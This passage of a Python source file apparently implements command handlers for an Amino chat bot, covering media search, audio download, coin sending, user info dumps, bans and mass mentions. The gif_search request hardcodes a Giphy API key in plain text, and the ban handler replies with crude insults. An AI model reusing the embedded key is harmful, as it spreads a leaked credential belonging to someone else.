None:\n\t\tprint(image)\n\t\tfilename = image.split(\"tbn:\")[-1]\n\t\turllib.request.urlretrieve(image, filename)\n\t\twith open(filename, 'rb') as fp:\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"image\")\n\t\t\t\tprint(os.remove(filename))\n\n\ndef gif_search(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsearch = message\n\twith suppress(Exception):\n\t\ttry:\n\t\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\texcept:\n\t\t\tsubClient.delete_message(chatId, messageId)\n\tresponse = requests.get(\n\t 'http://api.giphy.com/v1/gifs/search?q=' + search +\n\t '&api_key=1jdqvfFwB2Vf12z6ZJ72sqkYm1yz0VVM&limit=10')\n\t# print(response.text)\n\tdata = json.loads(response.text)\n\tgif_choice = random.randint(0, 9)\n\timage = data['data'][gif_choice]['images']['original']['url']\n\tprint(\"URL\", image)\n\tif image is not None:\n\t\tprint(image)\n\t\tfilename = image.split(\"/\")[-1]\n\t\turllib.request.urlretrieve(image, filename)\n\t\twith open(filename, 'rb') as fp:\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"gif\")\n\t\t\t\tprint(os.remove(filename))\n\n\ndef prank(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tcoins_val = (message)\n\twith suppress(Exception):\n\t\ttry:\n\t\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\texcept:\n\t\t\tsubClient.delete_message(chatId, messageId)\n\n\ttransactionId = \"18eb0607-0aa0-4b86-a420-06fc1156cd0a\"\n\told_chat = None\n\tif message and is_it_me(authorId):\n\t\tchat_ide = subClient.get_chat_id(message)\n\t\tif chat_ide:\n\t\t\told_chat = chatId\n\t\t\tchatId = chat_ide\n\tfor _ in range(1):\n\t\tsubClient.subclient.send_coins(coins=int(coins_val),\n\t\t chatId=chatId,\n\t\t transactionId=transactionId)\n\n\tif old_chat:\n\t\tchatId = old_chat\n\t\tsubClient.send_message(chatId, 
\"Done\")\n\n\ndef image(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tval = os.listdir(\"pictures\")\n\tif val:\n\t\tfile = choice(val)\n\t\twith suppress(Exception):\n\t\t\twith open(path_picture + file, 'rb') as fp:\n\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"image\")\n\telse:\n\t\tsubClient.send_message(chatId, \"Error! No file\")\n\n\ndef audio(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tval = os.listdir(path_sound)\n\tprint(\"VAL:\", val)\n\tif val:\n\t\tfile = choice(val)\n\t\tprint(\"File\", file)\n\t\twith suppress(Exception):\n\t\t\twith open(path_sound + \"/\" + file, 'rb') as fp:\n\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"audio\")\n\telse:\n\t\tsubClient.send_message(chatId, \"Error! No file\")\n\n\ndef telecharger(url):\n\tmusic = None\n\tif (\"=\" in url and \"/\" in url and \" \" not in url) or (\"/\" in url\n\t and \" \" not in url):\n\t\tif \"=\" in url and \"/\" in url:\n\t\t\tmusic = url.rsplit(\"=\", 1)[-1]\n\t\telif \"/\" in url:\n\t\t\tmusic = url.rsplit(\"/\")[-1]\n\n\t\tif music in os.listdir(path_sound):\n\t\t\treturn music\n\n\t\tydl_opts = {\n\t\t 'format':\n\t\t 'bestaudio/best',\n\t\t 'postprocessors': [{\n\t\t 'key': 'FFmpegExtractAudio',\n\t\t 'preferredcodec': 'mp3',\n\t\t 'preferredquality': '192',\n\t\t }],\n\t\t 'extract-audio':\n\t\t True,\n\t\t 'outtmpl':\n\t\t f\"{path_download}/{music}.webm\",\n\t\t}\n\n\t\twith YoutubeDL(ydl_opts) as ydl:\n\t\t\tvideo_length = ydl.extract_info(url, download=True).get('duration')\n\t\t\tydl.cache.remove()\n\n\t\turl = music + \".mp3\"\n\n\t\treturn url, video_length\n\treturn False, False\n\n\ndef decoupe(musical, temps):\n\tsize = 170\n\twith open(musical, \"rb\") as fichier:\n\t\tnombre_ligne = len(fichier.readlines())\n\n\tif temps < 180 or temps > 540:\n\t\treturn False\n\n\tdecoupage = int(size * nombre_ligne / temps)\n\n\tt = 0\n\tfile_list = 
[]\n\tfor a in range(0, nombre_ligne, decoupage):\n\t\tb = a + decoupage\n\t\tif b >= nombre_ligne:\n\t\t\tb = nombre_ligne\n\n\t\twith open(musical, \"rb\") as fichier:\n\t\t\tlignes = fichier.readlines()[a:b]\n\n\t\twith open(musical.replace(\".mp3\", \"PART\" + str(t) + \".mp3\"),\n\t\t \"wb\") as mus:\n\t\t\tfor ligne in lignes:\n\t\t\t\tmus.write(ligne)\n\n\t\tfile_list.append(musical.replace(\".mp3\", \"PART\" + str(t) + \".mp3\"))\n\t\tt += 1\n\treturn file_list\n\n\ndef convert(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tmusic, size = telecharger(message)\n\tif music:\n\t\tmusic = f\"{path_download}/{music}\"\n\t\tval = decoupe(music, size)\n\n\t\tif not val:\n\t\t\ttry:\n\t\t\t\twith open(music, 'rb') as fp:\n\t\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"audio\")\n\t\t\texcept Exception:\n\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t \"Error! File too heavy (9 min max)\")\n\t\t\tos.remove(music)\n\t\t\treturn\n\n\t\tos.remove(music)\n\t\tfor elem in val:\n\t\t\twith suppress(Exception):\n\t\t\t\twith open(elem, 'rb') as fp:\n\t\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"audio\")\n\t\t\tos.remove(elem)\n\t\treturn\n\tsubClient.send_message(chatId, \"Error! 
Wrong link\")\n\n\ndef helper(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif not message:\n\t\tsubClient.send_message(chatId, helpMsg)\n\telif message == \"staff\":\n\t\tsubClient.send_message(chatId, staff)\n\telif message == \"ask\":\n\t\tsubClient.send_message(chatId, helpAsk)\n\telse:\n\t\tsubClient.send_message(chatId, \"No help is available for this command\")\n\n\ndef reboot(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tsubClient.send_message(chatId, \"Restarting Bot\")\n\t\tos.execv(sys.executable, [\"None\", os.path.basename(sys.argv[0])])\n\n\n\ndef chat_copy(subClient=None, chatId=None, authorId=None, author=None, message=None, messageId=None):\n\tid=client.get_from_code(message). objectId\n\ti=subClient.subclient.get_chat_thread(chatId=id).icon\n\tc=subClient.subclient.get_chat_thread(chatId=id).content\n\tt=subClient.subclient.get_chat_thread(chatId=id).title\n\tbg=subClient.subclient.get_chat_thread(chatId=id).backgroundImage\n\ta=subClient.subclient.get_chat_thread(chatId=id).announcement\n\tsubClient.subclient.edit_chat(chatId=chatId,title=t,content=c,icon=i,announcement=a)\n\tsubClient.subclient.edit_chat(chatId=chatId,backgroundImage=bg)\n\ndef stop(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tsubClient.send_message(chatId, \"Stopping Bot\")\n\t\tos.execv(sys.executable, [\"None\", \"None\"])\n\n\ndef day(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\ttry:\n\t\ttoday = date.today()\n\t\tG = today.strftime(\"%A\")\n\t\td = time.strftime(\"%b %d %Y \\n %-I:%M %p\")\n\t\tsubClient.send_message(chatId=chatId, message=f\"{G} {d}\")\n\texcept:\n\t\tpass\n\n\ndef uinfo(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n 
message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tval = \"\"\n\t\tval2 = \"\"\n\t\tuid = \"\"\n\t\twith suppress(Exception):\n\t\t\tval = subClient.client.get_user_info(message)\n\n\t\twith suppress(Exception):\n\t\t\tval2 = subClient.subclient.get_user_info(message)\n\n\t\tif not val:\n\t\t\tuid = subClient.get_user_id(message)\n\t\t\tif uid:\n\t\t\t\tval = subClient.client.get_user_info(uid[1])\n\t\t\t\tval2 = subClient.subclient.get_user_info(uid[1])\n\t\t\tprint(val, val2)\n\n\t\tif not val:\n\t\t\twith suppress(Exception):\n\t\t\t\tlin = subClient.client.get_from_code(\n\t\t\t\t f\"http://aminoapps.com/u/{message}\"\n\t\t\t\t).json[\"extensions\"][\"linkInfo\"][\"objectId\"]\n\t\t\t\tval = subClient.client.get_user_info(lin)\n\n\t\t\twith suppress(Exception):\n\t\t\t\tval2 = subClient.subclient.get_user_info(lin)\n\n\t\twith suppress(Exception):\n\t\t\twith open(\"elJson.json\", \"w\") as file_:\n\t\t\t\tfile_.write(dumps(val.json, sort_keys=True, indent=4))\n\n\t\twith suppress(Exception):\n\t\t\twith open(\"elJson2.json\", \"w\") as file_:\n\t\t\t\tfile_.write(dumps(val2.json, sort_keys=True, indent=4))\n\n\t\tfor i in (\"elJson.json\", \"elJson2.json\"):\n\t\t\tif os.path.getsize(i):\n\t\t\t\ttxt2pdf.callPDF(i, \"result.pdf\")\n\t\t\t\tpages = convert_from_path('result.pdf', 150)\n\t\t\t\tfile = 'result.jpg'\n\t\t\t\tfor page in pages:\n\t\t\t\t\tpage.save(file, 'JPEG')\n\t\t\t\t\twith open(file, 'rb') as fp:\n\t\t\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t\t\t file=fp,\n\t\t\t\t\t\t fileType=\"image\")\n\t\t\t\t\tos.remove(file)\n\t\t\t\tos.remove(\"result.pdf\")\n\n\t\tif not os.path.getsize(\"elJson.json\") and not os.path.getsize(\n\t\t \"elJson.json\"):\n\t\t\tsubClient.send_message(chatId, \"Error!\")\n\n\ndef cinfo(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tval = \"\"\n\t\twith 
suppress(Exception):\n\t\t\tval = subClient.client.get_from_code(message)\n\n\t\twith suppress(Exception):\n\t\t\twith open(\"elJson.json\", \"w\") as file_:\n\t\t\t\tfile_.write(dumps(val.json, sort_keys=True, indent=4))\n\n\t\tif os.path.getsize(\"elJson.json\"):\n\t\t\ttxt2pdf.callPDF(\"elJson.json\", \"result.pdf\")\n\t\t\tpages = convert_from_path('result.pdf', 150)\n\t\t\tfor page in pages:\n\t\t\t\tfile = 'result.jpg'\n\t\t\t\tpage.save(file, 'JPEG')\n\t\t\t\twith open(file, 'rb') as fp:\n\t\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"image\")\n\t\t\t\tos.remove(file)\n\t\t\tos.remove(\"result.pdf\")\n\n\t\tif not os.path.getsize(\"elJson.json\"):\n\t\t\tsubClient.send_message(chatId, \"Error!\")\n\n\ndef sendinfo(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif (is_it_admin(authorId) or is_it_me(authorId)) and message != \"\":\n\t\targuments = message.strip().split()\n\t\tfor eljson in ('elJson.json', 'elJson2.json'):\n\t\t\tif Path(eljson).exists():\n\t\t\t\targ = arguments.copy()\n\t\t\t\twith open(eljson, 'r') as file:\n\t\t\t\t\tval = load(file)\n\t\t\t\ttry:\n\t\t\t\t\tmemoire = val[arg.pop(0)]\n\t\t\t\texcept Exception:\n\t\t\t\t\tsubClient.send_message(chatId, 'Wrong key!')\n\t\t\t\tif arg:\n\t\t\t\t\tfor elem in arg:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tmemoire = memoire[str(elem)]\n\t\t\t\t\t\texcept Exception:\n\t\t\t\t\t\t\tsubClient.send_message(chatId, 'Wrong key 1!')\n\t\t\t\tsubClient.send_message(chatId, memoire)\n\n\ndef get_global(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n mention = subClient.get_message_info(chatId=chatId, messageId=messageId).mentionUserIds\n for user in mention:\n AId = client.get_user_info(userId=str(user)).aminoId\n subClient.send_message(chatId,\n\t\t message=\"https://aminoapps.com/u/\" + str(AId))\n\n\ndef follow(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n 
messageId=None):\n\tsubClient.follow_user(authorId)\n\tsubClient.send_message(chatId, \"Now following you!\")\n\n\ndef unfollow(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsubClient.unfollow_user(authorId)\n\tsubClient.send_message(chatId, \"Unfollow!\")\n\n\ndef stop_amino(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tsubClient.stop_instance()\n\t\tdel communaute[subClient.community_id]\n\n\ndef block(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n mention = subClient.get_message_info(chatId=chatId, messageId=messageId).mentionUserIds\n for user in mention:\n subClient.client.block(str(user))\n subClient.send_message(chatId,\" blocked!\")\n\n\ndef unblock(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tval = subClient.client.get_blocked_users()\n\t\tfor aminoId, userId in zip(val.aminoId, val.userId):\n\t\t\tif message in aminoId:\n\t\t\t\tsubClient.client.unblock(userId)\n\t\t\t\tsubClient.send_message(chatId, f\"User {aminoId} unblocked!\")\n\n\ndef accept(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tval = subClient.subclient.get_notices(start=0, size=25)\n\t\tans = None\n\t\tres = None\n\t\tif subClient.accept_role(\"host\", chatId):\n\t\t\tsubClient.send_message(chatId, \"Accepted!\")\n\t\t\treturn\n\n\t\tfor elem in val:\n\t\t\tif 'become' in elem['title'] or \"host\" in elem['title']:\n\t\t\t\tres = elem['noticeId']\n\t\t\tif res:\n\t\t\t\tans = subClient.accept_role(res)\n\t\t\tif ans:\n\t\t\t\tsubClient.send_message(chatId, \"Accepted!\")\n\t\telse:\n\t\t\tsubClient.send_message(chatId, 
\"Error!\")\n\n\ndef hh(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsubClient.subclient.accept_organizer(chatId)\n\tsubClient.send_message(chatId, \"accept\")\n\n\ndef say(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\taudio_file = f\"{path_download}/ttp{randint(1,500)}.mp3\"\n\tlangue = list(lang.tts_langs().keys())\n\tif not message:\n\t\tmessage = subClient.subclient.get_chat_messages(chatId=chatId,\n\t\t size=2).content[1]\n\tgTTS(text=message, lang='en', slow=False).save(audio_file)\n\ttry:\n\t\twith open(audio_file, 'rb') as fp:\n\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"audio\")\n\texcept Exception:\n\t\tsubClient.send_message(chatId, \"Too heavy!\")\n\tos.remove(audio_file)\n\n\ndef ask_thing(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tlvl = \"\"\n\t\tboolean = 1\n\t\tif \"lvl=\" in message:\n\t\t\tlvl = message.rsplit(\"lvl=\", 1)[1].strip().split(\" \", 1)[0]\n\t\t\tmessage = message.replace(\"lvl=\" + lvl, \"\").strip()\n\t\telif \"lvl<\" in message:\n\t\t\tlvl = message.rsplit(\"lvl<\", 1)[1].strip().split(\" \", 1)[0]\n\t\t\tmessage = message.replace(\"lvl<\" + lvl, \"\").strip()\n\t\t\tboolean = 2\n\t\telif \"lvl>\" in message:\n\t\t\tlvl = message.rsplit(\"lvl>\", 1)[1].strip().split(\" \", 1)[0]\n\t\t\tmessage = message.replace(\"lvl>\" + lvl, \"\").strip()\n\t\t\tboolean = 3\n\t\ttry:\n\t\t\tlvl = int(lvl)\n\t\texcept ValueError:\n\t\t\tlvl = 20\n\n\t\tsubClient.ask_all_members(\n\t\t message +\n\t\t f\"\\n[CUI]This message was sent by {author}\\n[CUI]I am a bot and have a nice day^^\",\n\t\t lvl, boolean)\n\t\tsubClient.send_message(chatId, \"Asking...\")\n\n\ndef new_mention_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n 
messageId=None):\n\ti = 0\n\tcount = 0\n\tbreakflag = 0\n\tmes = \"\"\n\tuserar = []\n\twhile True:\n\t\tusers = subClient.subclient.get_chat_users(chatId=chatId,\n\t\t start=i,\n\t\t size=100)\n\t\tprint(\"users\", users.nickname)\n\t\tj = 0\n\t\tfor j in range(100):\n\t\t\ttry:\n\t\t\t\tmes = mes + f\"‎‏‎‏@{users.nickname[j]}\\n\"\n\t\t\t\tuserar.append(users.userId[j])\n\t\t\t\tcount += 1\n\t\t\t\tprint(\"mess\", mes)\n\t\t\texcept IndexError:\n\t\t\t\tbreakflag = 1\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tpass\n\t\ti += 100\n\t\tif breakflag == 1:\n\t\t\tbreak\n\n\tuserar = [\n\t userId\n\t for userId in subClient.subclient.get_chat_users(chatId=chatId).userId\n\t]\n\tsubClient.send_message(chatId=chatId, message=mes, mentionUserIds=userar)\n\n\ndef ask_staff(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tamino_list = client.sub_clients()\n\t\tfor commu in amino_list.comId:\n\t\t\tcommunaute[commu].ask_amino_staff(message=message)\n\t\tsubClient.send_message(chatId, \"Asking...\")\n\n\ndef bot_clear(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\n\tif (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tprint(\"clearing\")\n\t\tsize = 1\n\t\tmsg = \"\"\n\t\tval = \"\"\n\t\tsubClient.delete_message(chatId, messageId)\n\t\tif \"chat=\" in message and (is_it_me(authorId)\n\t\t or is_it_admin(authorId)):\n\t\t\tchat_name = message.rsplit(\"chat=\", 1).pop()\n\t\t\tchat_ide = subClient.get_chat_id(chat_name)\n\t\t\tif chat_ide:\n\t\t\t\tchatId = chat_ide\n\t\t\tmessage = \" \".join(message.strip().split()[:-1])\n\n\t\twith suppress(Exception):\n\t\t\tsize = int(message.strip().split(' ').pop())\n\t\t\tmsg = ' '.join(message.strip().split(' ')[:-1])\n\n\t\tif size > 50 and not is_it_me(authorId):\n\t\t\tsize = 50\n\n\t\tif msg:\n\t\t\ttry:\n\t\t\t\tval = subClient.get_user_id(msg)\n\t\t\texcept 
Exception:\n\t\t\t\tval = \"\"\n\n\t\tmessages = subClient.subclient.get_chat_messages(chatId=chatId,\n\t\t size=size)\n\t\t# print(\"clearing\")\n\t\tfor message, authorId in zip(messages.messageId,\n\t\t messages.author.userId):\n\t\t\tif not val:\n\t\t\t\tif authorId == botId:\n\t\t\t\t\tsubClient.delete_message(chatId, message)\n\t\t\telif authorId == val[1]:\n\t\t\t\tsubClient.delete_message(chatId, message)\n\n\ndef prefix(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif message:\n\t\tsubClient.set_prefix(message)\n\t\tsubClient.send_message(chatId, f\"prefix set as {message}\")\n\n\ndef lock_command(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tif not message or message in subClient.locked_command or message in (\n\t\t \"lock\", \"unlock\"):\n\t\t\treturn\n\t\ttry:\n\t\t\tmessage = message.lower().strip().split()\n\t\texcept Exception:\n\t\t\tmessage = [message.lower().strip()]\n\t\tsubClient.add_locked_command(message)\n\t\tsubClient.send_message(chatId, \"Locked command list updated\")\n\n\ndef unlock_command(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tif message:\n\t\t\ttry:\n\t\t\t\tmessage = message.lower().strip().split()\n\t\t\texcept Exception:\n\t\t\t\tmessage = [message.lower().strip()]\n\t\t\tsubClient.remove_locked_command(message)\n\t\t\tsubClient.send_message(chatId, \"Locked command list updated\")\n\n\ndef locked_command_list(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tval = \"\"\n\tif subClient.locked_command:\n\t\tfor elem in subClient.locked_command:\n\t\t\tval += elem + \"\\n\"\n\telse:\n\t\tval = \"No locked 
command\"\n\tsubClient.send_message(chatId, val)\n\n\ndef admin_lock_command(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tif not message or message not in commands_dict.keys(\n\t\t) or message == \"alock\":\n\t\t\treturn\n\n\t\tcommand = subClient.admin_locked_command\n\t\tmessage = [message]\n\n\t\tif message[0] in command:\n\t\t\tsubClient.remove_admin_locked_command(message)\n\t\telse:\n\t\t\tsubClient.add_admin_locked_command(message)\n\n\t\tsubClient.send_message(chatId, \"Locked command list updated\")\n\n\ndef locked_admin_command_list(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tval = \"\"\n\t\tif subClient.admin_locked_command:\n\t\t\tfor elem in subClient.admin_locked_command:\n\t\t\t\tval += elem + \"\\n\"\n\t\telse:\n\t\t\tval = \"No locked command\"\n\t\tsubClient.send_message(chatId, val)\n\n\ndef read_only(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId) and (subClient.is_in_staff(authorId)\n\t or is_it_me(authorId)\n\t or is_it_admin(authorId)):\n\t\tchats = subClient.only_view\n\t\tif chatId not in chats:\n\t\t\tsubClient.add_only_view(chatId)\n\t\t\tsubClient.send_message(chatId,\n\t\t\t \"This chat is now in only-view mode\")\n\t\telse:\n\t\t\tsubClient.remove_only_view(chatId)\n\t\t\tsubClient.send_message(chatId,\n\t\t\t \"This chat is no longer in only-view mode\")\n\t\treturn\n\telif not subClient.is_in_staff(botId):\n\t\tsubClient.send_message(chatId, \"The bot need to be in the staff!\")\n\n\ndef keep_favorite_users(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId) and (subClient.is_in_staff(authorId)\n\t or is_it_me(authorId)\n\t or 
is_it_admin(authorId)):\n\t\tusers = subClient.favorite_users\n\t\ttry:\n\t\t\tval = subClient.get_user_id(message)\n\t\t\tuser, userId = val[0], val[1]\n\t\texcept Exception:\n\t\t\tsubClient.send_message(chatId, \"Error, user not found!\")\n\t\t\treturn\n\t\tif userId not in users:\n\t\t\tsubClient.add_favorite_users(userId)\n\t\t\tsubClient.send_message(chatId, f\"Added {user} to favorite users\")\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.favorite(time=1, userId=userId)\n\t\treturn\n\telif not subClient.is_in_staff(botId):\n\t\tsubClient.send_message(chatId, \"The bot need to be in the staff!\")\n\n\ndef profile(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tmention = subClient.get_message_info(chatId=chatId,\n\t messageId=messageId).mentionUserIds\n\tprint(\"mention\", mention)\n\tfor user in mention:\n\t\tgg = subClient.subclient.get_user_info(userId=str(user)).icon\n\t\tu = subClient.subclient.get_user_info(userId=str(user)).mediaList\n\t\tfor mediaList in u:\n\t\t\tfor L in mediaList:\n\t\t\t\tif L != None and L != 100 and len(L):\n\t\t\t\t\tfor image in gg, L:\n\t\t\t\t\t\tprint(image)\n\t\t\t\t\t\tfilename = image.split(\"/\")[-1]\n\t\t\t\t\t\tfiletype = image.split(\".\")[-1]\n\t\t\t\t\t\tfiletype = filetype.replace(\" \", \"\")\n\t\t\t\t\t\t# print(\"filetype\",filetype)\n\t\t\t\t\t\tif filetype != \"gif\":\n\t\t\t\t\t\t\tfiletype = \"image\"\n\t\t\t\t\t\turllib.request.urlretrieve(image, filename)\n\t\t\t\t\t\twith open(filename, 'rb') as fp:\n\t\t\t\t\t\t\twith suppress(Exception):\n\t\t\t\t\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t\t\t\t\t file=fp,\n\t\t\t\t\t\t\t\t fileType=filetype)\n\t\t\t\t\t\t\t\tprint(os.remove(filename))\n\n\ndef edit_icon(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tdata = subClient.get_message_info(chatId=chatId, 
messageId=messageId)\n\t\treply_message = data.json['extensions']\n\t\tif reply_message:\n\t\t\timage = data.json['extensions']['replyMessage']['mediaValue']\n\t\t\tfor i in range(1, 5):\n\t\t\t\tsubClient.edit_profile(icon=image)\n\n\t\tsubClient.send_message(chatId, message=\"Done\")\n\n\ndef edit_bio(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tsubClient.edit_profile(content=message)\n\t\tsubClient.send_message(chatId, f\"Bio changed to {message} by {author}\")\n\n\ndef edit_name(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tsubClient.edit_profile(nickname=message)\n\t\tsubClient.send_message(chatId,\n\t\t f\"Name changed to {message} by {author}\")\n\n\ndef ban(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tmention = subClient.get_message_info(\n\t\t chatId=chatId, messageId=messageId).mentionUserIds\n\t\tfor user in mention:\n\t\t\tsubClient.ban(userId=str(user), reason=f\"{author}:{message}\")\n\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\ttry:\n\t\t\tsubClient.send_message(chatId, message=\"Hogya lodu ban\")\n\t\texcept Exception:\n\t\t\tsubClient.send_message(\n\t\t\t chatId,\n\t\t\t \"Error Bhosdike check kr leader ko to nahi kar raha ban\")\n\n\ndef unkeep_favorite_users(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId) and (subClient.is_in_staff(authorId)\n\t or is_it_me(authorId)\n\t or is_it_admin(authorId)):\n\t\tusers = subClient.favorite_users\n\t\ttry:\n\t\t\tval = subClient.get_user_id(message)\n\t\t\tuser, userId = val[0], val[1]\n\t\texcept 
Exception:\n\t\t\tsubClient.send_message(chatId, \"Error, user not found!\")\n\t\t\treturn\n\t\tif userId in users:\n\t\t\tsubClient.remove_favorite_users(userId)\n\t\t\tsubClient.send_message(chatId, f\"Removed {user} to favorite users\")\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.unfavorite(userId=userId)\n\t\treturn\n\telif not subClient.is_in_staff(botId):\n\t\tsubClient.send_message(chatId, \"The bot need to be in the staff!\")\n\n\ndef keep_favorite_chats(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId) and (subClient.is_in_staff(authorId)\n\t or is_it_me(authorId)\n\t or is_it_admin(authorId)):\n\t\tchats = subClient.favorite_chats\n\t\tval = subClient.get_chats()\n\n\t\tfor title, chatId in zip(val.title, val.chatId):\n\t\t\tif message == title and chatId not in chats:\n\t\t\t\tsubClient.add_favorite_chats(chatId)\n\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t f\"Added {title} to favorite chats\")\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tsubClient.favorite(time=1, chatId=chatId)\n\t\t\t\treturn\n\n\t\tfor title, chatId in zip(val.title, val.chatId):\n\t\t\tif message.lower() in title.lower() and chatId not in chats:\n\t\t\t\tsubClient.add_favorite_chats(chatId)\n\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t f\"Added {title} to favorite chats\")\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tsubClient.favorite(time=1, chatId=chatId)\n\t\t\t\treturn\n\telif not subClient.is_in_staff(botId):\n\t\tsubClient.send_message(chatId, \"The bot need to be in the staff!\")\n\n\ndef vc_com(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tinfo = client.get_from_code(message).objectId\n\tnm = 0\n\tc = 0\n\twhile True:\n\t\ttry:\n\t\t\taa = subClient.subclient.get_all_users(start=nm, size=1)\n\t\t\tfor userId, nickname in zip(aa.profile.userId,\n\t\t\t 
